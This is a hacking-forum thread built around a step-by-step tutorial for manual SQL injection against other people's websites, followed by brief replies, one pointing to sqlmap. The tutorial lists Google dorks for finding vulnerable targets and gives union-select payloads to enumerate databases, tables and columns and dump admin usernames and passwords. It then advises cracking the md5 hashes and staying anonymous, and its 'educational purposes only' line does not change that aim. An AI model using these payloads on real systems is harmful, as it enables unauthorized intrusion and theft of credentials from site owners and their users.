Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


[TuT] Manual SQL Injection [TuT] filter_list
Author
Message
[TuT] Manual SQL Injection [TuT] #1
Manual SQL Injection.

Step 1: Finding a target.
For those new to web hacking, using google dorks can really help. Here's a few:
Code:
inurl:index.php?id=
inurl:news.php?id=
inurl:gallery.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=

Click a link, let it load. If it properly loads, put a ' at the end, you will get something similar to this:
Spoiler:
NORMAL:
[Image: iAtBE.jpg]
TEST:
[Image: QIn9S.jpg]
Is exploitable!
Step 2: Find Number of Columns.

Now, take away the ' and add: order by 5--
If you get an error, cool, keep reading anyways. If not, read on-you have to.
Keep adding 5 until you get a screen similar to this:
Spoiler:
[Image: gbtLX.jpg]

Next, between the working 5 and the nonworking 5, bump the order by number up by 1 each time (order by 6--, order by 7--, etc.) until it doesn't load or gives an error. Of course, with my luck, I got the error ON error 10. Therefore, there is 9 columns!

Step 3: Find which column is vulnerable.

After id=, put a -
This is important!
Then, type in after the number, union all select 1,2,3,4,5,6,7,8,9--
Obviously, if your site only has 4 columns, it would be union all select 1,2,3,4
You'll be told which column is vulnerable directly.

Example:
Spoiler:
[Image: Qyqwg.jpg]

Step 4: Get the MySQL version

For the vulnerable column, replace the number with @@version

Example:

Spoiler:
[Image: wyLyA.jpg]


From now on, examples will be shown as mine, just modify this to work with your site!

Step 5: Get Databases

Change your info to: union all select 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata--

Spoiler:
[Image: 5stxB.jpg]

Then change group_concat(schema_name) to database(), which will give you your current database.

Step 6: Get Tables

Next:

union all select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--

Should give you the table list. Imgur stopped working, so start thinking!;D

I got a table called admin. Hell yes!

Step 7: Get Columns
union all select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database()--

I got some columns, one called adminUser and another called adminPassword.

Step 8: Admin Logins!
You're almost done!

union all select 1,group_concat(adminUser,0x3a,adminPassword,0x3a),3,4,5,6,7,8 from admin--

Remember, columns in parentheses, table at end

If you get strings of what looks to be randomized letters and numbers, this is md5, so just google "decrypt md5 online" or get Cain and Abel

From there, I think you know what to do.Wink


This is for educational purposes only. You're responsible for what you do, but remember to stay anonymous!

Zealotry
(This post was last modified: 11-11-2012, 08:03 PM by Dismas.)

[+] 2 users Like Zealotry's post
Reply

RE: [TuT] Manual SQL Injection [TuT] #2
Thanks Z! There are many available but I like in this the fact that you explain what you will do in every step

Reply

RE: [TuT] Manual SQL Injection [TuT] #3
But where next to login with admin user:pass if do not know path to admin/datebase panel

Reply

RE: [TuT] Manual SQL Injection [TuT] #4
I have a few questions, but this user seems to have left the site. Could someone link a good website hacking tutorial? SQL attacks seem to have been eradicated from the internet at this point.
Malware shouldn't be a criminal’s tool. Malware is an art form.

Reply

RE: [TuT] Manual SQL Injection [TuT] #5
(07-08-2022, 11:32 AM)Tascal Wrote: I have a few questions, but this user seems to have left the site. Could someone link a good website hacking tutorial? SQL attacks seem to have been eradicated from the internet at this point.
Some still have success using sqli. Check out sqlmap.

Reply

RE: [TuT] Manual SQL Injection [TuT] #6
(07-08-2022, 11:34 AM)Wares Wrote: Some still have success using sqli. Check out sqlmap.
Thanks, I’ll look into it.
Malware shouldn't be a criminal’s tool. Malware is an art form.

Reply

RE: [TuT] Manual SQL Injection [TuT] #7
(07-08-2022, 11:37 AM)Tascal Wrote:
(07-08-2022, 11:34 AM)Wares Wrote: Some still have success using sqli. Check out sqlmap.
Thanks, I’ll look into it.
Good for automating the proccess.

Reply

RE: [TuT] Manual SQL Injection [TuT] #8
WHAT IS THAT THING ABOVE THAT HAS SQL XSS ENCRYPTION CALLED?

Reply

RE: [TuT] Manual SQL Injection [TuT] #9
Thanks for sharing that bro I appreciate

Reply







Users browsing this thread: 1 Guest(s)